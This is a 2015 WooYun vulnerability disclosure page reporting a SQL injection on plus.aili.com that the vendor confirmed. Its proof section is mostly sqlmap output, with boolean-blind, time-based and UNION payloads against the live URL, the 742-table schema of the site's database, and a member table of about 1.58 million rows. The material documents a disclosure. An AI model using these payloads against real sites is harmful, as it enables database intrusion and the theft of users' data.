爱丽网sql注入150万用户 | wooyun-2015-0139661| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139661

漏洞标题：爱丽网sql注入150万用户

漏洞作者：乔一

提交时间：2015-09-08 10:55

修复时间：2015-10-23 11:32

公开时间：2015-10-23 11:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-08：细节已通知厂商并且等待厂商处理中
2015-09-08：厂商已经确认，细节仅向厂商公开
2015-09-18：细节向核心白帽子及相关领域专家公开
2015-09-28：细节向普通白帽子公开
2015-10-08：细节向实习白帽子公开
2015-10-23：细节向公众公开
简要描述：

我是川神唯一女徒弟，请不要送我男士的东东
详细说明：

川神再教我SQL注入时说先拿爱丽网练手吧，还能混个礼物，于是拿着川神的神器点啊点，然后突然就出结果了：
http://plus.aili.com/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df%27
我才学了3天，什么是请求还不太懂，O(∩_∩)O~更不会用什么sqlmap了
漏洞证明：

于是川神说，把这个日志复制过去就可以了
web application technology: PHP 5.2.14
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] newcms
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=(SELECT (CASE WHEN (4055=4055) THEN 4055 ELSE 4055*(SELECT 4055 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=2 AND (SELECT * FROM (SELECT(SLEEP(5)))vuFe)#
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6a71,0x7955714447467145586e,0x71786b6a71)-- #
---
web application technology: PHP 5.2.14
back-end DBMS: MySQL 5.0
Database: newcms
[742 tables]
+------------------------------------------+
| Jewelry_arc_image                        |
| Jewelry_archives                         |
| Jewelry_category                         |
| Jewelry_vote_config                      |
| 7120_eastdata_sp                         |
| 7120_eastdata_ty                         |
| 7120_eastmedicine_sort                   |
| 7120_illnessbase                         |
| 7120_illtype                             |
| 7120_part                                |
| 7120_westdata_sp                         |
| 7120_westdata_ty                         |
| 7120_westmedicine_sort                   |
| a_77_images                              |
| a_bgfg_archives                          |
| a_notk_archives                          |
| a_notk_images                            |
| admin                                    |
| admin_arc_upid                           |
| admin_count                              |
| admin_panel                              |
| admin_role                               |
| admin_role_cat                           |
| admin_role_priv                          |
| aili_adsell_brand                        |
| aili_adsell_type                         |
| aili_arc_star                            |
| aili_diyform1                            |
| aili_diyform4                            |
| aili_diyform5                            |
| aili_diyforms                            |
| aili_diyforms_fields                     |
| aili_diyforms_help                       |
| aili_diyforms_zform                      |
| aili_diyforms_zform_fields               |
| aili_feed                                |
| aili_feed_relation                       |
| aili_goods                               |
| aili_member                              |
| aili_member_deluser                      |
| aili_member_field                        |
| aili_member_keyfilter                    |
| aili_member_log                          |
| aili_member_logcate                      |
| aili_member_personal                     |
| aili_member_photo                        |
| aili_member_photocate                    |
| aili_member_prefer                       |
| aili_member_prefer_relation              |
| aili_member_readnum                      |
| aili_member_room                         |
| aili_member_skin                         |
| aili_member_tags                         |
| aili_member_tags_relation                |
| aili_member_visit                        |
| aili_member_visitnum                     |
| aili_sendweibo_conf                      |
| aili_sendweibo_users                     |
| aili_sph_counter                         |
| aili_star                                |
| aili_star_url                            |
| aili_store                               |
| aili_tags                                |
| aili_tags_art                            |
| aili_tags_attr                           |
| aili_tags_classify                       |
| aili_tags_classtags                      |
| aili_tags_email                          |
| aili_tags_push                           |
| aili_tags_recommend                      |
| aili_tags_tagAttr                        |
| aili_tags_tagsUser                       |
| aili_usercenter_beauty                   |
| aili_usercenter_glodblog                 |
| aili_usercenter_integralblog             |
| aili_usercenter_rule                     |
| aili_usercenter_setbeauty                |
| aili_usergroup_log                       |
| aili_weibo_attitude                      |
| aili_weibo_class                         |
| aili_weibo_discuss                       |
| aili_weibo_grade                         |
| aili_weibo_hot                           |
| aili_weibo_nums                          |
| aili_weibo_user                          |
| aili_weixin                              |
| aili_weixin_help                         |
| aili_weixin_payalarm                     |
| aili_weixin_paylog                       |
| aili_weixin_userinfo                     |
| ailimap                                  |
| album_contents                           |
| album_contents_lip                       |
| albums                                   |
| albums_lip                               |
| alone_page                               |
| api_menagement                           |
| app_ad                                   |
| app_arc_topic                            |
| app_archives                             |
| app_channel                              |
| app_feedback                             |
| app_images                               |
| app_new_article                          |
| app_new_image                            |
| app_recommend                            |
| app_topic                                |
| app_version                              |
| arc_channel                              |
| arc_column                               |
| arc_flag                                 |
| arc_flag_img                             |
| arc_hzp_pro                              |
| arc_index                                |
| arc_recom                                |
| arc_topic                                |
| archive_count                            |
| archive_total                            |
| archives                                 |
| archives_gq                              |
| archives_jk                              |
| archives_lip                             |
| archives_peter                           |
| archivesbkpeter                          |
| article_img_new                          |
| articles                                 |
| articles_img                             |
| articles_lip                             |
| articles_play_bak                        |
| authors                                  |
| bishengyuan                              |
| bishengyuan_prize                        |
| block                                    |
| block_art                                |
| category_priv                            |
| channel_count                            |
| channel_total                            |
| channels                                 |
| cms_bbs_log                              |
| cms_bbs_relation                         |
| collection_content                       |
| collection_history                       |
| collection_node                          |
| collection_program                       |
| column_count                             |
| column_order_relation                    |
| column_total                             |
| columns                                  |
| comment_admin_panel                      |
| comment_admin_role_priv                  |
| comment_bq                               |
| comment_comments                         |
| comment_menu                             |
| comment_sites                            |
| comment_templet_category                 |
| comment_templets                         |
| comment_total                            |
| comments                                 |
| comments_topic                           |
| comments_topic_bak                       |
| crontab                                  |
| cscdn_count                              |
| cscdn_log                                |
| database_query_log                       |
| domainip                                 |
| dzxbb_common_relation                    |
| dzxbbs_common_addon                      |
| dzxbbs_common_admincp_cmenu              |
| dzxbbs_common_admincp_group              |
| dzxbbs_common_admincp_member             |
| dzxbbs_common_admincp_perm               |
| dzxbbs_common_admincp_session            |
| dzxbbs_common_admingroup                 |
| dzxbbs_common_adminnote                  |
| dzxbbs_common_adminsession               |
| dzxbbs_common_advertisement              |
| dzxbbs_common_advertisement_custom       |
| dzxbbs_common_banned                     |
| dzxbbs_common_block                      |
| dzxbbs_common_block_item                 |
| dzxbbs_common_block_item_archive         |
| dzxbbs_common_block_item_data            |
| dzxbbs_common_block_permission           |
| dzxbbs_common_block_style                |
| dzxbbs_common_cache                      |
| dzxbbs_common_credit_log                 |
| dzxbbs_common_credit_rule                |
| dzxbbs_common_credit_rule_log            |
| dzxbbs_common_credit_rule_log_field      |
| dzxbbs_common_cron                       |
| dzxbbs_common_district                   |
| dzxbbs_common_diy_data                   |
| dzxbbs_common_domain                     |
| dzxbbs_common_failedlogin                |
| dzxbbs_common_friendlink                 |
| dzxbbs_common_invite                     |
| dzxbbs_common_magic                      |
| dzxbbs_common_magiclog                   |
| dzxbbs_common_mailcron                   |
| dzxbbs_common_mailqueue                  |
| dzxbbs_common_member                     |
| dzxbbs_common_member_count               |
| dzxbbs_common_member_field_forum         |
| dzxbbs_common_member_field_home          |
| dzxbbs_common_member_log                 |
| dzxbbs_common_member_magic               |
| dzxbbs_common_member_profile             |
| dzxbbs_common_member_profile_setting     |
| dzxbbs_common_member_security            |
| dzxbbs_common_member_stat_field          |
| dzxbbs_common_member_stat_fieldcache     |
| dzxbbs_common_member_stat_search         |
| dzxbbs_common_member_stat_searchcache    |
| dzxbbs_common_member_status              |
| dzxbbs_common_member_validate            |
| dzxbbs_common_member_verify              |
| dzxbbs_common_member_verify_info         |
| dzxbbs_common_myapp                      |
| dzxbbs_common_myapp_count                |
| dzxbbs_common_myinvite                   |
| dzxbbs_common_mytask                     |
| dzxbbs_common_nav                        |
| dzxbbs_common_onlinetime                 |
| dzxbbs_common_plugin                     |
| dzxbbs_common_pluginvar                  |
| dzxbbs_common_process                    |
| dzxbbs_common_regip                      |
| dzxbbs_common_report                     |
| dzxbbs_common_searchindex                |
| dzxbbs_common_secquestion                |
| dzxbbs_common_session                    |
| dzxbbs_common_setting                    |
| dzxbbs_common_smiley                     |
| dzxbbs_common_sphinxcounter              |
| dzxbbs_common_stat                       |
| dzxbbs_common_statuser                   |
| dzxbbs_common_style                      |
| dzxbbs_common_stylevar                   |
| dzxbbs_common_syscache                   |
| dzxbbs_common_task                       |
| dzxbbs_common_taskvar                    |
| dzxbbs_common_template                   |
| dzxbbs_common_template_block             |
| dzxbbs_common_template_permission        |
| dzxbbs_common_uin_black                  |
| dzxbbs_common_usergroup                  |
| dzxbbs_common_usergroup_field            |
| dzxbbs_common_word                       |
| dzxbbs_connect_feedlog                   |
| dzxbbs_connect_memberbindlog             |
| dzxbbs_connect_tlog                      |
| dzxbbs_dsu_paulsign                      |
| dzxbbs_dsu_paulsignset                   |
| dzxbbs_forum_access                      |
| dzxbbs_forum_activity                    |
| dzxbbs_forum_activityapply               |
| dzxbbs_forum_announcement                |
| dzxbbs_forum_attachment                  |
| dzxbbs_forum_attachmentfield             |
| dzxbbs_forum_attachtype                  |
| dzxbbs_forum_bbcode                      |
| dzxbbs_forum_creditslog                  |
| dzxbbs_forum_debate                      |
| dzxbbs_forum_debatepost                  |
| dzxbbs_forum_faq                         |
| dzxbbs_forum_forum                       |
| dzxbbs_forum_forum_threadtable           |
| dzxbbs_forum_forumfield                  |
| dzxbbs_forum_forumrecommend              |
| dzxbbs_forum_groupcreditslog             |
| dzxbbs_forum_groupfield                  |
| dzxbbs_forum_groupinvite                 |
| dzxbbs_forum_grouplevel                  |
| dzxbbs_forum_groupranking                |
| dzxbbs_forum_groupuser                   |
| dzxbbs_forum_imagetype                   |
| dzxbbs_forum_medal                       |
| dzxbbs_forum_medallog                    |
| dzxbbs_forum_memberrecommend             |
| dzxbbs_forum_moderator                   |
| dzxbbs_forum_modwork                     |
| dzxbbs_forum_onlinelist                  |
| dzxbbs_forum_order                       |
| dzxbbs_forum_poll                        |
| dzxbbs_forum_polloption                  |
| dzxbbs_forum_pollvoter                   |
| dzxbbs_forum_post                        |
| dzxbbs_forum_post_tableid                |
| dzxbbs_forum_postcomment                 |
| dzxbbs_forum_postlog                     |
| dzxbbs_forum_postposition                |
| dzxbbs_forum_poststick                   |
| dzxbbs_forum_promotion                   |
| dzxbbs_forum_ratelog                     |
| dzxbbs_forum_relatedthread               |
| dzxbbs_forum_replaycontent               |
| dzxbbs_forum_replaypost                  |
| dzxbbs_forum_replayposts                 |
| dzxbbs_forum_rsscache                    |
| dzxbbs_forum_spacecache                  |
| dzxbbs_forum_statlog                     |
| dzxbbs_forum_thread                      |
| dzxbbs_forum_threadclass                 |
| dzxbbs_forum_threadlog                   |
| dzxbbs_forum_threadmod                   |
| dzxbbs_forum_threadtype                  |
| dzxbbs_forum_trade                       |
| dzxbbs_forum_tradecomment                |
| dzxbbs_forum_tradelog                    |
| dzxbbs_forum_typeoption                  |
| dzxbbs_forum_typeoptionvar               |
| dzxbbs_forum_typevar                     |
| dzxbbs_forum_warning                     |
| dzxbbs_home_album                        |
| dzxbbs_home_album_category               |
| dzxbbs_home_appcreditlog                 |
| dzxbbs_home_blacklist                    |
| dzxbbs_home_blog                         |
| dzxbbs_home_blog_category                |
| dzxbbs_home_blogfield                    |
| dzxbbs_home_class                        |
| dzxbbs_home_click                        |
| dzxbbs_home_clickuser                    |
| dzxbbs_home_comment                      |
| dzxbbs_home_docomment                    |
| dzxbbs_home_doing                        |
| dzxbbs_home_favorite                     |
| dzxbbs_home_feed                         |
| dzxbbs_home_feed_app                     |
| dzxbbs_home_friend                       |
| dzxbbs_home_friend_request               |
| dzxbbs_home_friendlog                    |
| dzxbbs_home_notification                 |
| dzxbbs_home_pic                          |
| dzxbbs_home_picfield                     |
| dzxbbs_home_poke                         |
| dzxbbs_home_pokearchive                  |
| dzxbbs_home_share                        |
| dzxbbs_home_show                         |
| dzxbbs_home_specialuser                  |
| dzxbbs_home_userapp                      |
| dzxbbs_home_userapp_stat                 |
| dzxbbs_home_userappfield                 |
| dzxbbs_home_viewlog                      |
| dzxbbs_home_visitor                      |
| dzxbbs_kx_bind_info                      |
| dzxbbs_kx_bind_thread                    |
| dzxbbs_kx_session                        |
| dzxbbs_moodwall                          |
| dzxbbs_myrepeats                         |
| dzxbbs_pointsmall_advertisement          |
| dzxbbs_pointsmall_announcement           |
| dzxbbs_pointsmall_custom                 |
| dzxbbs_pointsmall_product                |
| dzxbbs_pointsmall_productorder           |
| dzxbbs_pointsmall_productpost            |
| dzxbbs_pointsmall_shippingorder          |
| dzxbbs_portal_article_content            |
| dzxbbs_portal_article_count              |
| dzxbbs_portal_article_related            |
| dzxbbs_portal_article_title              |
| dzxbbs_portal_article_trash              |
| dzxbbs_portal_attachment                 |
| dzxbbs_portal_category                   |
| dzxbbs_portal_category_permission        |
| dzxbbs_portal_comment                    |
| dzxbbs_portal_topic                      |
| dzxbbs_portal_topic_pic                  |
| dzxbbs_prize_userinfo                    |
| dzxbbs_purifyhylanda                     |
| dzxbbs_qq_bind_info                      |
| dzxbbs_ucenter_admins                    |
| dzxbbs_ucenter_applications              |
| dzxbbs_ucenter_badwords                  |
| dzxbbs_ucenter_domains                   |
| dzxbbs_ucenter_failedlogins              |
| dzxbbs_ucenter_feeds                     |
| dzxbbs_ucenter_friends                   |
| dzxbbs_ucenter_mailqueue                 |
| dzxbbs_ucenter_memberfields              |
| dzxbbs_ucenter_members                   |
| dzxbbs_ucenter_mergemembers              |
| dzxbbs_ucenter_newpm                     |
| dzxbbs_ucenter_notelist                  |
| dzxbbs_ucenter_pms                       |
| dzxbbs_ucenter_protectedmembers          |
| dzxbbs_ucenter_settings                  |
| dzxbbs_ucenter_sqlcache                  |
| dzxbbs_ucenter_tags                      |
| dzxbbs_ucenter_vars                      |
| dzxbbs_webim_histories                   |
| dzxbbs_webim_settings                    |
| dzxbbs_weibo_bind                        |
| dzxbbs_weibo_bind_user                   |
| dzxbbs_weibo_idol                        |
| dzxbbs_weibo_setting                     |
| dzxbbs_weibo_stat                        |
| dzxbbs_weibo_synlist                     |
| dzxbbs_weixin_bind_info                  |
| dzxbbs_xwb_bind_info                     |
| dzxbbs_xwb_bind_thread                   |
| dzxbbs_xwb_session                       |
| enterprise                               |
| enterprise_case                          |
| enterprise_evaluate                      |
| enterprise_evaluate_score                |
| enterprise_info                          |
| enterprise_level                         |
| enterprise_type                          |
| exam_form                                |
| exam_form_element                        |
| exam_student                             |
| exam_student_title                       |
| exam_title                               |
| favorites                                |
| flag                                     |
| friend_link                              |
| friend_link_class                        |
| haina_test                               |
| help                                     |
| help_type                                |
| history_log                              |
| homepage                                 |
| hot_tags                                 |
| hot_tags_class                           |
| images                                   |
| images_lip                               |
| imgs                                     |
| index_count                              |
| keylist                                  |
| keywords                                 |
| log_albums                               |
| log_arccreate                            |
| log_articles                             |
| log_channels                             |
| log_columns                              |
| log_create                               |
| log_images                               |
| log_login                                |
| log_sys                                  |
| log_templet_category                     |
| log_templets                             |
| log_topics                               |
| log_votes                                |
| mango_field                              |
| mango_member                             |
| mango_vote_config                        |
| menu                                     |
| menu_message                             |
| message                                  |
| miaobali                                 |
| miaobali_userinfo                        |
| msnad                                    |
| navigation                               |
| new_vote_answer                          |
| new_vote_main                            |
| new_vote_option                          |
| new_vote_problem                         |
| notice                                   |
| pctag                                    |
| people                                   |
| people_contents                          |
| pk_cdata                                 |
| pk_cdata_log                             |
| pk_comment                               |
| pk_comment_log                           |
| pk_tdata                                 |
| pk_tdata_log                             |
| pk_themes                                |
| pro_admin                                |
| pro_admin_panel                          |
| pro_admin_role                           |
| pro_admin_role_priv                      |
| pro_announce                             |
| pro_attachment                           |
| pro_attachment_index                     |
| pro_attr                                 |
| pro_badword                              |
| pro_block                                |
| pro_block_history                        |
| pro_block_priv                           |
| pro_brand                                |
| pro_brand_user                           |
| pro_business_try_apply                   |
| pro_buycar                               |
| pro_cache                                |
| pro_category                             |
| pro_category_priv                        |
| pro_category_relation                    |
| pro_collection_content                   |
| pro_collection_history                   |
| pro_collection_node                      |
| pro_collection_program                   |
| pro_comment                              |
| pro_comment_check                        |
| pro_comment_data_1                       |
| pro_comment_relation                     |
| pro_comment_setting                      |
| pro_comment_table                        |
| pro_content_check                        |
| pro_copyfrom                             |
| pro_datacall                             |
| pro_dbsource                             |
| pro_dianping                             |
| pro_dianping_data                        |
| pro_dianping_type                        |
| pro_download                             |
| pro_download_data                        |
| pro_downservers                          |
| pro_extend_setting                       |
| pro_favorite                             |
| pro_hits                                 |
| pro_ipbanned                             |
| pro_keylink                              |
| pro_link                                 |
| pro_linkage                              |
| pro_log                                  |
| pro_maillist                             |
| pro_member                               |
| pro_member_address                       |
| pro_member_detail                        |
| pro_member_group                         |
| pro_member_menu                          |
| pro_member_verify                        |
| pro_member_vip                           |
| pro_menu                                 |
| pro_message                              |
| pro_message_data                         |
| pro_message_group                        |
| pro_model                                |
| pro_model_field                          |
| pro_module                               |
| pro_mood                                 |
| pro_news                                 |
| pro_news_data                            |
| pro_order                                |
| pro_page                                 |
| pro_pay_account                          |
| pro_pay_payment                          |
| pro_pay_spend                            |
| pro_picture                              |
| pro_picture_data                         |
| pro_plugin                               |
| pro_plugin_var                           |
| pro_position                             |
| pro_position_data                        |
| pro_poster                               |
| pro_poster_201208                        |
| pro_poster_201209                        |
| pro_poster_201210                        |
| pro_poster_201211                        |
| pro_poster_201212                        |
| pro_poster_201301                        |
| pro_poster_201302                        |
| pro_poster_201303                        |
| pro_poster_201304                        |
| pro_poster_201305                        |
| pro_poster_201306                        |
| pro_poster_201307                        |
| pro_poster_201308                        |
| pro_poster_201309                        |
| pro_poster_201310                        |
| pro_poster_201311                        |
| pro_poster_201312                        |
| pro_poster_201401                        |
| pro_poster_201402                        |
| pro_poster_201403                        |
| pro_poster_201404                        |
| pro_poster_201405                        |
| pro_poster_201406                        |
| pro_poster_201407                        |
| pro_poster_201408                        |
| pro_poster_201409                        |
| pro_poster_201410                        |
| pro_poster_201411                        |
| pro_poster_201412                        |
| pro_poster_201501                        |
| pro_poster_201502                        |
| pro_poster_201503                        |
| pro_poster_201504                        |
| pro_poster_201505                        |
| pro_poster_201506                        |
| pro_poster_201507                        |
| pro_poster_201508                        |
| pro_poster_201509                        |
| pro_poster_space                         |
| pro_product_attr                         |
| pro_queue                                |
| pro_release_point                        |
| pro_search                               |
| pro_search_keyword                       |
| pro_session                              |
| pro_site                                 |
| pro_sms_report                           |
| pro_sontag                               |
| pro_special                              |
| pro_special_c_data                       |
| pro_special_content                      |
| pro_sphinx_counter                       |
| pro_sso_admin                            |
| pro_sso_applications                     |
| pro_sso_members                          |
| pro_sso_messagequeue                     |
| pro_sso_session                          |
| pro_sso_settings                         |
| pro_tag                                  |
| pro_template_bak                         |
| pro_times                                |
| pro_type                                 |
| pro_urlrule                              |
| pro_vote_data                            |
| pro_vote_option                          |
| pro_vote_subject                         |
| pro_wap                                  |
| pro_wap_type                             |
| pro_watch_brand_2                        |
| pro_watch_brand_2_data                   |
| pro_workflow                             |
| pro_yp_brand                             |
| pro_yp_brand_data                        |
| pro_yp_buy                               |
| pro_yp_buy_data                          |
| pro_yp_certificate                       |
| pro_yp_clientfeed                        |
| pro_yp_company                           |
| pro_yp_cos_attain_cat                    |
| pro_yp_cos_attain_cat_conf               |
| pro_yp_cos_attain_cat_xinde              |
| pro_yp_cos_attain_conf                   |
| pro_yp_cos_attain_confs                  |
| pro_yp_cos_xinde_conf                    |
| pro_yp_cos_xinde_relation                |
| pro_yp_count_think_huangzhuangpin_member |
| pro_yp_datacount                         |
| pro_yp_digital                           |
| pro_yp_digital_data                      |
| pro_yp_digital_view                      |
| pro_yp_fans                              |
| pro_yp_guestbook                         |
| pro_yp_huangzhuang_brand                 |
| pro_yp_huangzhuang_brand_arc             |
| pro_yp_huangzhuang_brand_data            |
| pro_yp_huazhuangpin                      |
| pro_yp_huazhuangpin_arc                  |
| pro_yp_huazhuangpin_data                 |
| pro_yp_huozhuangpin_url                  |
| pro_yp_hzp_analyse                       |
| pro_yp_hzp_useful                        |
| pro_yp_jubao                             |
| pro_yp_product                           |
| pro_yp_product_data                      |
| pro_yp_product_selfattr                  |
| pro_yp_product_top                       |
| pro_yp_relation                          |
| pro_yp_supplier                          |
| pro_yp_supplier_brand                    |
| pro_yp_supplier_product                  |
| pro_yp_think                             |
| pro_yp_think_img                         |
| pro_yp_try_analyse                       |
| pro_yp_try_application                   |
| pro_yp_try_applications                  |
| pro_yp_try_com_ip                        |
| pro_yp_try_comment                       |
| pro_yp_try_comment_img                   |
| pro_yp_try_cosmetic                      |
| pro_yp_try_dingyue_data                  |
| pro_yp_try_dingyue_user                  |
| pro_yp_try_experts                       |
| pro_yp_try_integral                      |
| pro_yp_try_integral_set                  |
| pro_yp_try_jour                          |
| pro_yp_try_manage                        |
| pro_yp_try_manage_data                   |
| pro_yp_try_pclady                        |
| pro_yp_try_placard                       |
| pro_yp_try_regular                       |
| pro_yp_try_relation                      |
| pro_yp_try_sentiment                     |
| pro_yp_try_top                           |
| pro_yp_try_useful                        |
| pro_yp_try_userinfo                      |
| pro_yp_wjthink                           |
| pro_yp_zhubao                            |
| pro_yp_zhubao_brand                      |
| pro_yp_zhubao_brand_data                 |
| pro_yp_zhubao_data                       |
| rtss                                     |
| source                                   |
| suggest                                  |
| sys_config                               |
| sys_config_group                         |
| tags                                     |
| tags_arc                                 |
| tags_bbs                                 |
| tags_category                            |
| tags_flink                               |
| tags_log                                 |
| tags_relation                            |
| tags_upid                                |
| tagscate_channel                         |
| tarot_url                                |
| task                                     |
| task_log                                 |
| temp_archives                            |
| temp_fengxiongjianfei                    |
| temp_table                               |
| temp_tags                                |
| templet_canedit                          |
| templet_category                         |
| templets                                 |
| tmp_tag4                                 |
| topic_block                              |
| topic_block_style                        |
| topic_count                              |
| topic_diy_data                           |
| topic_diy_tpl                            |
| topic_hallowmas_ip                       |
| topic_hallowmas_user                     |
| topic_history                            |
| topic_lab_user                           |
| topic_pic                                |
| topic_total                              |
| topic_uservote                           |
| topicad_type                             |
| topics                                   |
| tpl_history                              |
| tpl_type                                 |
| try_manage_view                          |
| tryer                                    |
| video                                    |
| vote                                     |
| vote_comments                            |
| vote_count                               |
| vote_option                              |
| webnav                                   |
| webnav_class                             |
| weixin_list                              |
| weixin_menu                              |
| weixin_message                           |
| yesky                                    |
| zg_jiemeng                               |
+------------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=(SELECT (CASE WHEN (4055=4055) THEN 4055 ELSE 4055*(SELECT 4055 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=2 AND (SELECT * FROM (SELECT(SLEEP(5)))vuFe)#
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6a71,0x7955714447467145586e,0x71786b6a71)-- #
---
web application technology: PHP 5.2.14
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=(SELECT (CASE WHEN (4055=4055) THEN 4055 ELSE 4055*(SELECT 4055 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=2 AND (SELECT * FROM (SELECT(SLEEP(5)))vuFe)#
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6a71,0x7955714447467145586e,0x71786b6a71)-- #
---
web application technology: PHP 5.2.14
back-end DBMS: MySQL 5.0
Database: newcms
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| dzxbbs_ucenter_members | 1583148 |
+------------------------+---------+
修复方案：

怎么打吗？修复神马的还不会，送个面膜
版权声明：转载请注明来源乔一@乌云

漏洞回应

厂商回应：

危害等级：高
漏洞Rank：18
确认时间：2015-09-08 11:31
厂商回复：

补洞洞，走起……
WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139661

漏洞标题：爱丽网sql注入150万用户

相关厂商：aili.com

漏洞作者：乔一

提交时间：2015-09-08 10:55

修复时间：2015-10-23 11:32

公开时间：2015-10-23 11:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源乔一@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139661

漏洞标题：爱丽网sql注入150万用户

相关厂商：aili.com

漏洞作者： 乔一

提交时间：2015-09-08 10:55

修复时间：2015-10-23 11:32

公开时间：2015-10-23 11:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0139661"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 乔一@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：乔一

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源乔一@乌云
